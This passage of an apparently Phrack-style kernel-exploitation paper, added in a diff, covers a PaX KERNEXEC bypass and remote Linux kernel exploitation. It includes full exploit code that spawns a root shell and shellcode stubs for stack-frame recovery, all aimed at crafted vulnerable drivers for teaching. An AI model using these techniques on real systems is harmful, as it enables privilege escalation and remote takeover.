+  char *addr = flat_file_mmap(fd);
+
+  fill_ancillary(&msg, addr);
+
+  munmap(addr, PAGE_SIZE*PAGE_NUM);
+  close(fd);
+  make_kjump();
+  sync();
+
+  printf("Flush all pages and press a enter:)\n");
+  getchar();
+
+  fd = open("/tmp/file", O_RDWR);
+  if(fd == -1)
+    fatal_errno("open", 1);
+  addr = flat_file_mmap(fd);
+
+  int t_pid = start_thread_priority(race_func, NULL);
+  printf("[*] thread main getpid()=%d\n", getpid());
+
+  start_flush_access(addr, 32);
+
+
+  int sc[2];
+  int sp_ret = socketpair(AF_UNIX, SOCK_STREAM, 0, sc);
+  if(sp_ret < 0)
+    fatal_errno("socketpair", 1);
+
+  single_stamp.access = (uint32_t)g_ancillary;
+  single_stamp.before = tsc();
+
+  glob_race =1;
+  sendmsg(sc[0], &msg, 0);
+
+  single_stamp.after = tsc();
+
+  print_single_result(&single_stamp);
+
+  kill(t_pid, SIGKILL);
+  munmap(addr, PAGE_SIZE*PAGE_NUM);
+  close(fd);
+  return 0;
+}
+
+< / > 
+
+
+------[ 3 - Advanced scenarios 
+
+
+In an attempt to ''complete'' our tractation on kernel exploiting we're
+now going to discuss two 'advanced scenarios' : a stack based kernel
+exploit capable to bypass PaX [18] KERNEXEC and Userland / Kernelland
+split and an effective remote exploit, both for the Linux kernel. 
+
+
+---[ 3.1 - PaX KERNEXEC & separated kernel/user space
+
+
+The PaX KERNEXEC option emulates a no-exec bit for pages at kernel land
+on an architecture which hasn't it (x86), while the User / Kerne Land
+split blocks the 'return-to-userland' approach that we have extensively
+described and used in the paper. With those two protections active we're
+basically facing the same scenario we encountered discussing the 
+Solaris/SPARC environment, so we won't go in more details here (to avoid
+duplicating the tractation). 
+
+This time, thou, we won't have any executable and controllable memory area
+(no u_psargs array), and we're going to present a different tecnique which
+doesn't require to have one. Even if the idea behind applyes well to any
+no-exec and separated kernel/userspace environment, as we'll see in a
+short, this approach is quite architectural (stack management and function
+call/return implementation) and Operating System (handling of credentials)
+specific. 
+
+Moreover, it requires a precise knowledge of the .text layout of the
+running kernel, so at least a readable image (which is a default situation
+on many distros, on Solaris, and on other operating systems we checked) or
+a large or controlled infoleak is necessary. 
+
+The idea behind is not much different from the theory behind
+'ret-into-libc' or other userland exploiting approaches that attempt to
+circumvent the non executability of heap and stack : as we know, Linux
+associates credentials to each process in term of numeric values :
+
+< linux-2.6.15/include/linux/sched.h >
+
+struct task_struct {
+[...]
+/* process credentials */
+        uid_t uid,euid,suid,fsuid;
+        gid_t gid,egid,sgid,fsgid;
+[...]
+}
+
+< / > 
+
+Sometimes a process needs to raise (or drop, for security reasons) its
+credentials, so the kernel exports systemcalls to do that. 
+One of those is sys_setuid :
+
+< linux-2.6.15/kernel/sys.c >
+
+asmlinkage long sys_setuid(uid_t uid)
+{
+        int old_euid = current->euid;
+        int old_ruid, old_suid, new_ruid, new_suid;
+        int retval;
+
+        retval = security_task_setuid(uid, (uid_t)-1, (uid_t)-1,
+LSM_SETID_ID);
+        if (retval)
+                return retval;
+
+        old_ruid = new_ruid = current->uid;
+        old_suid = current->suid;
+        new_suid = old_suid;
+
+        if (capable(CAP_SETUID)) {              [1]
+                if (uid != old_ruid && set_user(uid, old_euid != uid) < 0)
+                        return -EAGAIN;
+                new_suid = uid;
+        } else if ((uid != current->uid) && (uid != new_suid))
+                return -EPERM;
+
+        if (old_euid != uid)
+        {
+                current->mm->dumpable = suid_dumpable;
+                smp_wmb();
+        }
+        current->fsuid = current->euid = uid;    [2] 
+        current->suid = new_suid;
+
+        key_fsuid_changed(current);
+        proc_id_connector(current, PROC_EVENT_UID);
+
+        return security_task_post_setuid(old_ruid, old_euid, old_suid,
+LSM_SETID_ID);
+}
+
+< / > 
+
+As you can see, the 'security' checks (out of the LSM security_* entry
+points) are performed at [1] and after those, at [2] the values of fsuid
+and euid are set equal to the value passed to the function. 
+sys_setuid is a system call, so, due to systemcall convention, parameters
+are passed in register. More precisely, 'uid' will be passed in '%ebx'. 
+The idea is so simple (and not different from 'ret-into-libc' [19] or 
+other userspace page protection evading tecniques like [20]), if we manage
+to have 0 into %ebx and to jump right in the middle of sys_setuid (and
+right after the checks) we should be able to change the 'euid' and 'fsuid'
+of our process and thus raise our priviledges. 
+
+Let's see the sys_setuid disassembly to better tune our idea :
+
+[...]
+c0120fd0:       b8 00 e0 ff ff          mov    $0xffffe000,%eax  [1]
+c0120fd5:       21 e0                   and    %esp,%eax
+c0120fd7:       8b 10                   mov    (%eax),%edx
+c0120fd9:       89 9a 6c 01 00 00       mov    %ebx,0x16c(%edx)  [2]
+c0120fdf:       89 9a 74 01 00 00       mov    %ebx,0x174(%edx)
+c0120fe5:       8b 00                   mov    (%eax),%eax
+c0120fe7:       89 b0 70 01 00 00       mov    %esi,0x170(%eax)
+c0120fed:       6a 01                   push   $0x1
+c0120fef:       8b 44 24 04             mov    0x4(%esp),%eax
+c0120ff3:       50                      push   %eax
+c0120ff4:       55                      push   %ebp
+c0120ff5:       57                      push   %edi
+c0120ff6:       e8 65 ce 0c 00          call   c01ede60
+c0120ffb:       89 c2                   mov    %eax,%edx
+c0120ffd:       83 c4 10                add    $0x10,%esp        [3]  
+c0121000:       89 d0                   mov    %edx,%eax
+c0121002:       5e                      pop    %esi
+c0121003:       5b                      pop    %ebx
+c0121004:       5e                      pop    %esi
+c0121005:       5f                      pop    %edi
+c0121006:       5d                      pop    %ebp
+c0121007:       c3                      ret
+
+
+At [1] the current process task_struct is taken from the kernel stack
+value. At [2] the %ebx value is copied over the 'euid' and 'fsuid' members
+of the struct. We have our return address, which is [1]. 
+At that point we need to force somehow %ebx into being 0 (if we're not
+lucky enough to have it already zero'ed).
+
+To demonstrate this vulnerability we have used the local exploitable
+buffer overflow in dummy.c driver (KERN_IOCTL_STORE_CHUNK ioctl()
+command). Since it's a stack based overflow we can chain multiple return
+address preparing a fake stack frame that we totally control. 
+We need : 
+
+ - a zero'ed %ebx : the easiest way to achieve that is to find a pop %ebx
+   followed by a ret instruction [we control the stack] : 
+
+	ret-to-pop-ebx:
+		[*] c0100cd3:       5b      pop    %ebx
+		[*] c0100cd4:       c3      ret
+    
+   we don't strictly need pop %ebx directly followed by ret, we may find a
+   sequence of pops before the ret (and, among those, our pop %ebx). It is
+   just a matter of preparing the right ZERO-layout for the pop sequence
+   (to make it simple, add a ZERO 4-bytes sequence for any pop between the
+   %ebx one and the ret)    
+
+ - the return addr where to jump, which is the [1] address shown above
+
+ - a 'ret-to-ret' padding to take care of the stack gap created at [3] by
+   the function epilogue (%esp adding and register popping) :
+	
+	ret-to-ret pad:
+		[*] 0xffffe413      c3      ret 
+
+   (we could have used the above ret aswell, this one is into vsyscall
+    page and was used in other exploit where we didn't need so much
+    knowledge of the kernel .text.. it survived here :) )
+
+ - the address of an iret instruction to return to userland (and a crafted
+   stack frame for it, as we described above while discussing 'Stack
+   Based' explotation) :
+
+	ret-to-iret:
+		[*] c013403f:       cf      iret
+
+
+Putting all together this is how our 'stack' should look like to perform a
+correct explotation :
+
+low addresses
+            +----------------+
+            | ret-to-ret pad |
+            | ret-to-ret pad |
+            | .............. |
+            | ret-to-pop ebx |
+            | 0x00000000     |
+            | ret-to-setuid  |
+            | ret-to-ret pad |
+            | ret-to-ret pad |
+            | ret-to-ret pad |
+            | .............  |
+            | .............  |
+            | ret-to-iret    |
+            | fake-iret-frame|
+            +----------------+
+high addresses
+
+
+Once correctly returned to userspace we have successfully modified 'fsuid'
+and 'euid' value, but our 'ruid' is still the original one. At that point
+we simply re-exec ourselves to get euid=0 and then spawn the shell. 
+Code follows :
+
+< stuff/expl/grsec_noexec.c >
+
+#include <sys/ioctl.h>
+#include <signal.h>
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sys/mman.h>
+
+#include "dummy.h"
+
+#define DEVICE "/dev/dummy"
+#define NOP 0x90
+#define PAGE_SIZE 0x1000
+#define STACK_SIZE 8192
+//#define STACK_SIZE 4096
+
+
+#define STACK_MASK ~(STACK_SIZE -1)
+/* patch it at runtime */
+
+
+#define ALTERNATE_STACK 0x00BBBBBB
+
+/*2283d*/
+#define RET_INTO_RET_STR   "\x3d\x28\x02\x00"
+#define DUMMY              RET_INTO_RET_STR
+#define ZERO               "\x00\x00\x00\x00"
+
+/* 22ad3 */
+#define RET_INTO_POP_EBX   "\xd3\x2a\x02\x00"
+/* 1360 */
+#define RET_INTO_IRET      "\x60\x13\x00\x00"
+/* 227fc */
+#define RET_INTO_SETUID    "\xfc\x27\x02\x00"
+
+// do_eip at .text offset (rivedere)
+// 0804864f
+#define USER_CODE_OFFSET   "\x4f\x86\x04\x08"
+#define USER_CODE_SEGMENT  "\x73\x00\x00\x00"
+#define USER_EFLAGS        "\x46\x02\x00\x00"
+#define USER_STACK_OFFSET  "\xbb\xbb\xbb\x00"
+#define USER_STACK_SEGMENT "\x7b\x00\x00\x00"
+
+
+/* sys_setuid - grsec kernel */
+/*
+   227fc:       89 e2                   mov    %esp,%edx
+   227fe:       89 f1                   mov    %esi,%ecx
+   22800:       81 e2 00 e0 ff ff       and    $0xffffe000,%edx
+   22806:       8b 02                   mov    (%edx),%eax
+   22808:       89 98 50 01 00 00       mov    %ebx,0x150(%eax)
+   2280e:       89 98 58 01 00 00       mov    %ebx,0x158(%eax)
+   22814:       8b 02                   mov    (%edx),%eax
+   22816:       89 fa                   mov    %edi,%edx
+   22818:       89 a8 54 01 00 00       mov    %ebp,0x154(%eax)
+   2281e:       c7 44 24 18 01 00 00    movl   $0x1,0x18(%esp)
+   22825:       00
+   22826:       8b 04 24                mov    (%esp),%eax
+   22829:       5d                      pop    %ebp
+   2282a:       5b                      pop    %ebx
+   2282b:       5e                      pop    %esi
+   2282c:       5f                      pop    %edi
+   2282d:       5d                      pop    %ebp
+   2282e:       e9 ef d5 0c 00          jmp    efe22
+<cap_task_post_setuid>
+   22833:       83 ca ff                or     $0xffffffff,%edx
+   22836:       89 d0                   mov    %edx,%eax
+   22838:       5f                      pop    %edi
+   22839:       5b                      pop    %ebx
+   2283a:       5e                      pop    %esi
+   2283b:       5f                      pop    %edi
+   2283c:       5d                      pop    %ebp
+   2283d:       c3                      ret
+
+*/
+
+/* pop %ebx, ret grsec
+ *
+ * ffd1a884:       5b                      pop    %ebx
+ * ffd1a885:       c3                      ret
+ */
+
+char *g_prog_name;
+
+char kern_noexec_shellcode[] =
+RET_INTO_RET_STR
+RET_INTO_RET_STR
+RET_INTO_RET_STR
+RET_INTO_RET_STR
+RET_INTO_RET_STR
+RET_INTO_RET_STR
+RET_INTO_RET_STR
+RET_INTO_RET_STR
+RET_INTO_RET_STR
+RET_INTO_RET_STR
+RET_INTO_RET_STR
+RET_INTO_RET_STR
+RET_INTO_RET_STR
+RET_INTO_RET_STR
+RET_INTO_RET_STR
+RET_INTO_RET_STR
+RET_INTO_POP_EBX
+ZERO
+RET_INTO_SETUID
+RET_INTO_RET_STR
+RET_INTO_RET_STR
+RET_INTO_RET_STR
+RET_INTO_POP_EBX
+RET_INTO_POP_EBX
+RET_INTO_POP_EBX
+RET_INTO_POP_EBX
+RET_INTO_POP_EBX
+RET_INTO_POP_EBX
+RET_INTO_POP_EBX
+RET_INTO_POP_EBX
+RET_INTO_RET_STR
+RET_INTO_RET_STR
+RET_INTO_IRET
+USER_CODE_OFFSET
+USER_CODE_SEGMENT
+USER_EFLAGS
+USER_STACK_OFFSET
+USER_STACK_SEGMENT
+;
+
+
+void re_exec(int useless)
+{
+  char *a[3] = { g_prog_name, "exec", NULL };
+  execve(g_prog_name, a, NULL);
+}
+
+
+char *allocate_jump_stack(unsigned int jump_addr, unsigned int size)
+{
+  unsigned int round_addr = jump_addr & 0xFFFFF000;
+  unsigned int diff       = jump_addr - round_addr;
+  unsigned int len        = (size + diff + 0xFFF) & 0xFFFFF000;
+  char *map_addr = mmap((void*)round_addr,
+                        len,
+                        PROT_READ|PROT_WRITE,
+                        MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,
+                        0,
+                        0);
+
+  if(map_addr == (char*)-1)
+    return NULL;
+
+  memset(map_addr, 0x00, len);
+
+  return map_addr;
+}
+
+
+char *allocate_jump_code(unsigned int jump_addr, void* code, unsigned int
+size)
+{
+  unsigned int round_addr = jump_addr & 0xFFFFF000;
+  unsigned int diff       = jump_addr - round_addr;
+  unsigned int len        = (size + diff + 0xFFF) & 0xFFFFF000;
+
+  char *map_addr = mmap((void*)round_addr,
+                        len,
+                        PROT_READ|PROT_WRITE|PROT_EXEC,
+                        MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS,
+                        0,
+                        0);
+
+  if(map_addr == (char*)-1)
+    return NULL;
+
+  memset(map_addr, NOP, len);
+  memcpy(map_addr+diff, code, size);
+
+  return map_addr + diff;
+}
+
+
+inline void patch_code_4byte(char *code, unsigned int offset, unsigned int
+value)
+{
+  *((unsigned int *)(code + offset)) = value;
+}
+
+
+int main(int argc, char *argv[])
+{
+  if(argc > 1)
+  {
+    int ret;
+    char *argvx[] = {"/bin/sh", NULL};
+    ret = setuid(0);
+    printf("euid=%d, ret=%d\n", geteuid(), ret);
+    execve("/bin/sh", argvx, NULL);
+    exit(1);
+  }
+
+  signal(SIGSEGV, re_exec);
+
+  g_prog_name = argv[0];
+  char *stack_jump =
+          allocate_jump_stack(ALTERNATE_STACK, PAGE_SIZE);
+
+  if(!stack_jump)
+  {
+    fprintf(stderr, "Exiting: mmap failed");
+    exit(1);
+  }
+
+
+
+  char *memory = malloc(PAGE_SIZE), *mem_orig;
+  mem_orig = memory;
+
+  memset(memory, 0xDD, PAGE_SIZE);
+
+
+  struct device_io_ctl *ptr = (struct device_io_ctl*)memory;
+  ptr->chunk_num = 9 + (sizeof(kern_noexec_shellcode)-1)/sizeof(struct
+device_io_blk) + 1;
+  printf("Chunk num: %d\n", ptr->chunk_num);
+  ptr->type = 0xFFFFFFFF;
+
+  memory += (sizeof(struct device_io_ctl) + sizeof(struct device_io_blk) *
+9);
+
+  /* copy shellcode */
+  memcpy(memory, kern_noexec_shellcode, sizeof(kern_noexec_shellcode)-1);
+
+  int i, fd = open(DEVICE,  O_RDONLY);
+  if(fd < 0)
+    return 0;
+
+  ioctl(fd, KERN_IOCTL_STORE_CHUNK, (unsigned long)mem_orig);
+  return 0;
+}
+
+< / >
+
+
+As we said, we have chosen the PaX security patches for Linux/x86, but
+some of the theory presented equally works well in other situation. 
+A slightly different exploiting approach was successfully used on
+Solaris/SPARC. (we leave it as an 'exercise' for the reader ;)) 
+
+  
+---[ 3.2 - Remote Kernel Exploiting 
+
+
+Writing a working and somehow reliable remote kernel exploit is an
+exciting and interesting challenge. Keeping on with the 'style' of this
+paper we're going to propose here a couple of tecniques and 'life notes'
+that leaded us into succeeding into writing an almost reliable, image
+independant and effective remote exploit.
+
+After the first draft of this paper, a couple of things changed, so some
+of the information presented here could be outdated in the very latest
+kernels (and compiler releases), but are anyway a good base for the
+tractation (we've added notes all around this chapter about changes and
+updates into the recent releases of the linux kernel).
+
+A couple of the ideas presented here converged into a real remote exploit
+for the madwifi remote kernel stack buffer overflow [21], that we already
+released [22], without examining too much in detail the explotation
+approaches used. This chapter can be thus seen both as the introduction
+and the extension of that work. 
+More precisely we will cover here also the exploiting issues and solution
+when dealing with code running in interrupt context, which is the most
+common running mode for network based code (interrupt handler, softirq,
+etc) but which wasn't the case for the madwifi exploit.
+The same ideas apply well to kernel thread context too.
+
+Explotation tecniques and discussion is based on stack based buffer
+overflow on the Linux 2.6.* branch of kernels on the x86 architecture, but
+can be reused in most of the conditions that lead us to take control over 
+the instruction flow.
+
+
+------[ 3.2.1 - The Network Contest 
+
+
+We begin with a few considerations about the typology of kernel code that 
+we'll be dealing with. Most of that code runs in interrupt context (and
+sometimes in a kernel thread context), so we have some 'limitations' :
+
+  - we can't directly 'return-to-userspace', since we don't have a valid 
+    current task pointer. Moreover, most of times, we won't control the
+    address space of the userland process we talk with. Netherless we can
+    relay on some 'fixed' points, like the ELF header (given there's no
+    PIE / .text randomization on the remote box)
+
+  - we can't perform any action that might make the kernel path to sleep
+    (for example a memory fault access)
+
+  - we can't directly call a system call 
+ 
+  - we have to take in account kernel resource management, since such kind
+    of kernel paths usually acquire spinlocks or disables pre-emption. We
+    have to restore them in a stable state.
+
+Logically, since we are from remote, we don't have any information about
+structs or kernel paths addresses, so, since a good infoleaking is usually
+a not very probable situation, we can't rely on them. 
+
+We have prepared a crafted example that will let us introduce all the
+tecniques involved to solve the just stated problems. We choosed to write
+a netfilter module, since quite a lot of the network kernel code depends
+on it and it's the main framework for third part modules. 
+
+< stuff/drivers/linux/remote/dummy_remote.c >
+
+#define MAX_TWSKCHUNK 30
+#define TWSK_PROTO    37
+
+struct twsk_chunk
+{
+  int type;
+  char buff[12];
+};
+
+struct twsk
+{
+  int chunk_num;
+  struct twsk_chunk chunk[0];
+};
+
+
+static int process_twsk_chunk(struct sk_buff *buff)
+{
+  struct twsk_chunk chunks[MAX_TWSKCHUNK];
+
+  struct twsk *ts = (struct twsk *)((char*)buff->nh.iph +
+(buff->nh.iph->ihl * 4));
+
+  if(ts->chunk_num > MAX_TWSKCHUNK)                                   [1]                               
+    return (NF_DROP);
+
+  printk(KERN_INFO "Processing TWSK packet: packet frame n. %d\n",
+ts->chunk_num);
+
+memcpy(chunks, ts->chunk, sizeof(struct twsk_chunk) * ts->chunk_num); [2] 
+
+  // do somethings..
+
+  return (NF_ACCEPT);
+
+}
+
+< / >
+
+
+We have a signedness issue at [1], which triggers a later buffer overflow
+at [2], writing past the local 'chunks' buffer. 
+As we just said, we must know everything about the vulnerable function,
+that is, when it runs, under which 'context' it runs, what calls what, how
+would the stack look like, if there are spinlocks or other control 
+management objects acquired, etc.
+
+A good starting point is dumping a stack trace at calling time of our
+function :
+
+#1  0xc02b5139 in nf_iterate (head=0xc042e4a0, skb=0xc1721ad0, hook=0, [1]
+    indev=0xc1224400, outdev=0x0, i=0xc1721a88,
+    okfn=0xc02bb150 <ip_rcv_finish>, hook_thresh=-2147483648)
+    at net/netfilter/core.c:89
+#2  0xc02b51b9 in nf_hook_slow (pf=2, hook=1, pskb=0xc1721ad0,         [2] 
+    indev=0xc1224400, outdev=0x0, okfn=0xc02bb150 <ip_rcv_finish>,
+    hook_thresh=-2147483648) at net/netfilter/core.c:125
+#3  0xc02baee3 in ip_rcv (skb=0xc1bc4a40, dev=0xc1224400, pt=0xc0399310,
+    orig_dev=0xc1224400) at net/ipv4/ip_input.c:348
+#4  0xc02a5432 in netif_receive_skb (skb=0xc1bc4a40) at
+net/core/dev.c:1657
+#5  0xc024d3c2 in rtl8139_rx (dev=0xc1224400, tp=0xc1224660, budget=64)
+    at drivers/net/8139too.c:2030
+#6  0xc024d70e in rtl8139_poll (dev=0xc1224400, budget=0xc1721b78)
+    at drivers/net/8139too.c:2120
+#7  0xc02a5633 in net_rx_action (h=0xc0417078) at net/core/dev.c:1739
+#8  0xc0118a75 in __do_softirq () at kernel/softirq.c:95
+#9  0xc0118aba in do_softirq () at kernel/softirq.c:129                [3]
+#10 0xc0118b7d in irq_exit () at kernel/softirq.c:169
+#11 0xc0104212 in do_IRQ (regs=0xc1721ad0) at arch/i386/kernel/irq.c:110
+#12 0xc0102b0a in common_interrupt () at current.h:9
+#13 0x0000110b in ?? ()
+ 
+Our vulnerable function (just like any other hook) is called serially by
+the nf_iterate one [1], during the processing of a softirq [3], through
+the netfilter core interface nf_hook_slow [2]. 
+It is installed in the INPUT chain and, thus, it starts processing packets
+whenever they are sent to the host box, as we see from [2] where pf = 2
+(PF_INET) and hook = 1 (NF_IP_LOCAL_IN). 
+
+Our final goal is to execute some kind of code that will estabilish a
+connection back to us (or bind a port to a shell, or whatever kind of
+shellcoding you like more for your remote exploit). Trying to execute it
+directly from kernel land is obviously a painful idea so we need to hijack
+some userland process (remember that we are on top of a softirq, so we
+have no clue about what's really beneath us; it could equally be a kernel
+thread or the idle task, for example) as our victim, to inject some code
+inside and force the kernel to call it later on, when we're out of an
+asyncronous event.
+
+That means that we need an intermediary step between taking the control
+over the flow at 'softirq time' and execute from the userland process. 
+But let's go on order, first of all we need to _start executing_ at least
+the entry point of our shellcode. 
+
+As it is nowadays used in many exploit that have to fight against address
+space randomization in the absence of infoleaks, we look for a jump to a 
+jmp *%esp or push reg/ret or call reg sequence, to start executing from a
+known point.
+To avoid guessing the right return value a nop-alike padding of
+ret-into-ret addresses can be used. But we still need to find those
+opcodes in a 'fixed' and known place.
+
+The 2.6. branch of kernel introduced a fixed page [*] for the support of
+the 'sysenter' instruction, the 'vsyscall' one :
+
+bfe37000-bfe4d000 rwxp bfe37000 00:00 0          [stack]
+ffffe000-fffff000 ---p 00000000 00:00 0          [vdso]
+
+which is located at a fixed address : 0xffffe000 - 0xfffff000. 
+
+[*] At time of release this is no more true on latest kernels, since the
+    address of the vsyscall page is randomized starting from the 2.6.18 
+    kernel. 
+ 
+The 'vsyscall' page is a godsend for our 'entry point' shellcode, since we
+can locate inside it the required opcodes [*] to start executing : 
+
+(gdb) x/i 0xffffe75f
+0xffffe75f:     jmp    *%esp
+(gdb) x/i 0xffffe420
+0xffffe420:     ret
+
+[*] After testing on a wide range of kernels/compilers the addresses of 
+    those opcodes we discovered that sometimes they were not in the
+    expected place or, even, in one case, not present. This could be the
+    only guessing part you could be facing (also due to vsyscall
+    randomization, as we said in the note before), but there are
+    (depending on situations) other possibilities [fixed start of the
+    kernel image, fixed .text of the 'running process' if out of interrupt 
+    context, etc].
+
+To better figure out how the layout of the stack should be after the
+overflow, here there's a small schema :
+
++-------------+
+|             |
+|             |
+| JMP -N      |-------+     # N is the size of the buffer plus some bytes
+|             |       |       (ret-to-ret chain + jmp space)
+|             |       |
+| ret-to-jmp  |<-+    |     # the address of the jmp *%esp inside vsyscall
+|             |  |    |
+| .........   | -+    |
+|             |  |    |
+| ret-to-ret  | -+    |     # the address of 'ret' inide vsyscall 
+|             |  |    |
+| ret-to-ret  | -+    |
+|             |       |
+| overwritten |       |     # ret-to-ret padding starting from there
+| ret address |       |
+|             |       |
+|             |       |
+|      ^      |       |
+|      |      |       |     # shellcode is placed inside the buffer
+|             |       |       because it's huge, but it could also be
+|  shellcode  |       |       splitted before and after the ret addr.
+|   nop       |       |
+|   nop       |<------+
++-------------+
+ 
+    
+At that point we control the flow, but we're still inside the softirq, so
+we need to perform a couple of tasks to cleanly get our connect back
+shellcode executed :
+
+  - find a way to cleanly get out from the softirq, since we trashed the 
+    stack 
+  - locate the resource management objects that have been modified (if
+    the've been) and restore them to a safe state
+  - find a place where we can store our shellcode untill later execution 
+    from a 'process context' kernel path.
+  - find a way to force the before mentioned kernel path to execute our
+    shellcode
+
+The first step is the most difficult one (and wasn't necessary in the
+madwifi exploit, since we weren't in interrupt context), because we've
+overwritten the original return pointer and we have no clue about the
+kernel text layout and addresses.
+
+We're going now to present tecniques and a working shellcode for each one
+of the above points. [ Note that we have mentioned them in a 'conceptual
+order of importance', which is different from the real order that we use
+inside the exploit. More precisely, they are almost in reverse order,
+since the last step performed by our shellcode is effectively getting out
+from the softirq. We felt that approach more well-explanatory, just
+remember that note during the following sub-chapters] 
+
+
+------[ 3.2.2 - Stack Frame Flow Recovery   
+
+ 
+The goal of this tecnique is to unroll the stack, looking for some known
+pattern and trying to reconstruct a caller stack frame, register status
+and instruction pointing, just to continue over with the normal flow. 
+We need to restore the stack pointer to a known and consistent state,
+restore register contents so that the function flow will exit cleanily and
+restore any lock or other syncronization object that was modified by the
+functions among the one we overflowed in and the one we want to 'return
+to'. 
+
+Our stack layout (as seen from the dump pasted above) would basically be
+that one :
+
+stack layout
++---------------------+   bottom of stack
+|                     |
+| do_softirq()        |
+| ..........          |             /* nf_hook_slow() stack frame */
+| ..........          |             +------------------------+
+|                     |             |  argN                  |
+|                     |             |  ...                   |
+| ip_rcv              |             |  arg2                  |
+| nf_hook_slow        | =========>  |  arg1                  |
+| ip_rcv_finish       |             |  ret-to-(ip_rcv())     |
+| nf_iterate          |             |  saved reg1            |
+|                     |             |  saved reg2            |
+|                     |             |  ......                |
+| ..............      |             +------------------------+
+| ..............      |
+| process_twsk_chunk  |
+|                     |
++---------------------+  top of stack
+
+
+As we said, we need to locate a function in the previous stack frames, not
+too far from our overflowing one, having some 'good pattern' that would
+help us in our search.
+Our best bet, in that situation, is to check parameter passing : 
+
+#2  0xc02b51b9 in nf_hook_slow (pf=2, hook=1, pskb=0xc1721ad0,
+indev=0xc1224400, outdev=0x0, ....)
+
+The 'nf_hook_slow()' function has a good 'signature' :              
+
+  -  two consecutive dwords 0x00000002 and 0x00000002
+  -  two kernel pointers (dword > 0xC0000000)
+  -  a following NULL dword
+
+We can relay on the fact that this pattern would be a constant, since
+we're in the INPUT chain, processing incoming packets, and thus always
+having a NULL 'outdev', pf = 2 and hook = 1.
+Parameters passing is logically not the only 'signature' possible :
+depending on situations you could find a common pattern in some local
+variable (which would be even a better one, because we discovered that
+some versions of GCC optimize out some parameters, passing them through
+registers). 
+
+Scanning backward the stack from the process_twsk_chunk() frame up to
+the nf_hook_slow() one, we can later set the %esp value to the place where 
+is saved the return address of nf_hook_slow(), and, once recreated the 
+correct conditions, perform a 'ret' that would let us exit cleanily.
+We said 'once recreated the correct conditions' because the function could
+expect some values inside registers (that we have to set) and could expect
+some 'lock' or 'preemption set' different from the one we had at time of
+overflowing. Our task is thus to emulate/restore all those requirements.
+
+To achieve that, we can start checking how gcc restores registers during
+function epilogue :
+
+c02b6b30 <nf_hook_slow>:
+c02b6b30:       55                      push   %ebp
+c02b6b31:       57                      push   %edi
+c02b6b32:       56                      push   %esi
+c02b6b33:       53                      push   %ebx
+[...]
+c02b6bdb:       89 d8                   mov    %ebx,%eax
+c02b6bdd:       5a                      pop    %edx       ==+
+c02b6bde:       5b                      pop    %ebx         |
+c02b6bdf:       5e                      pop    %esi         | restore
+c02b6be0:       5f                      pop    %edi         |
+c02b6be1:       5d                      pop    %ebp        =+
+c02b6be2:       c3                      ret
+
+This kind of epilogue, which is common for non-short functions let us
+recover the state of the saved register. Once we have found the 'ret'
+value on the stack we can start 'rolling back' counting how many 'pop' are
+there inside the text to correctly restore those register. [*]
+
+[*] This is logically not the only possibility, one could set directly the
+    values via movl, but sometimes you can't use 'predefined' values for
+    those register. As a side note, some versions of the gcc compiler
+    don't use the push/pop prologue/epilogue, but translate the code as a
+    sequence of movl (which need a different handling from the shellcode).      
+ 
+To correctly do the 'unrolling' (and thus locate the pop sequence), we
+need the kernel address of 'nf_hook_slow()'. This one is not hard to
+calculate since we have already found on the stack its return addr (thanks
+to the signature pointed out before). Once again is the intel calling
+procedures convention which help us :
+
+[...]
+c02bc8bd:       6a 02                   push   $0x2
+c02bc8bf:       e8 6c a2 ff ff          call   c02b6b30 <nf_hook_slow>
+c02bc8c4:       83 c4 1c                add    $0x1c,%esp
+[...]
+
+That small snippet of code is taken from ip_rcv(), which is the function
+calling nf_hook_slow(). We have found on the stack the return address,
+which is 0xc02bc8c4, so calculating the nf_hook_slow address is just a
+matter of calculating the 'displacement' used in the relative call (opcode
+0xe8, the standard calling convention on kernel gcc-compiled code) and
+adding it to the return addr value (INTEL relative call convention adds
+the displacement to the current EIP) : 
+
+[*] call to nf_hook_slow -> 0xe8 0x6c 0x2a 0xff 0xff 
+[*] nf_hook_slow address -> 0xc02bc8c4 + 0xffffa26c = 0xc02b6b30 
+
+To better understand the whole Stack Frame Flow Recovery approach here's
+the shellcode stub doing it, with short comments :
+
+ - Here we increment the stack pointer with the 'pop %eax' sequence and
+   test for the known signature [ 0x2 0x1 X X 0x0 ].
+
+loop:
+"\x58"                  // pop    %eax
+"\x83\x3c\x24\x02"      // cmpl   $0x2,(%esp)
+"\x75\xf9"              // jne    loop
+"\x83\x7c\x24\x04\x01"  // cmpl   $0x1,0x4(%esp)
+"\x75\xf2"              // jne    loop
+"\x83\x7c\x24\x10\x00"  // cmpl   $0x0,0x10(%esp)
+"\x75\xeb"              // jne    loop
+"\x8d\x64\x24\xfc"      // lea    0xfffffffc(%esp),%esp
+  
+ - get the return address, subtract 4 bytes and deference the pointer to get
+   the nf_hook_slow() offset/displacement. Add it to the return address to
+   obtain the nf_hook_slow() address. 
+
+"\x8b\x04\x24"          // mov    (%esp),%eax
+"\x89\xc3"              // mov    %eax,%ebx
+"\x03\x43\xfc"          // add    0xfffffffc(%ebx),%eax
+
+ - locate the 0xc3 opcode inside nf_hook_slow(), eliminating 'spurious'
+   0xc3 bytes. In this shellcode we do a simple check for 'movl' opcodes
+   and that's enough to avoid 'false positive'. With a larger shellcode
+   one could write a small disassembly routine that would let perform a
+   more precise locating of the 'ret' and 'pop' [see later]. 
+
+increment:
+"\x40"                  // inc    %eax
+"\x8a\x18"              // mov    (%eax),%bl
+"\x80\xfb\xc3"          // cmp    $0xc3,%bl
+"\x75\xf8"              // jne    increment
+"\x80\x78\xff\x88"      // cmpb   $0x88,0xffffffff(%eax)
+"\x74\xf2"              // je     increment
+"\x80\x78\xff\x89"      // cmpb   $0x89,0xffffffff(%eax)
+"\x74\xec"              // je     8048351 increment
+
+ - roll back from the located 'ret' up to the last pop instruction, if 
+   any and count the number of 'pop's.  
+  
+pop:
+"\x31\xc9"              // xor    %ecx,%ecx
+"\x48"                  // dec    %eax
+"\x8a\x18"              // mov    (%eax),%bl
+"\x80\xe3\xf0"          // and    $0xf0,%bl
+"\x80\xfb\x50"          // cmp    $0x50,%bl
+"\x75\x03"              // jne    end
+"\x41"                  // inc    %ecx
+"\xeb\xf2"              // jmp    pop
+"\x40"                  // inc    %eax
+
+ - use the calculated byte displacement from ret to rollback %esp value
+
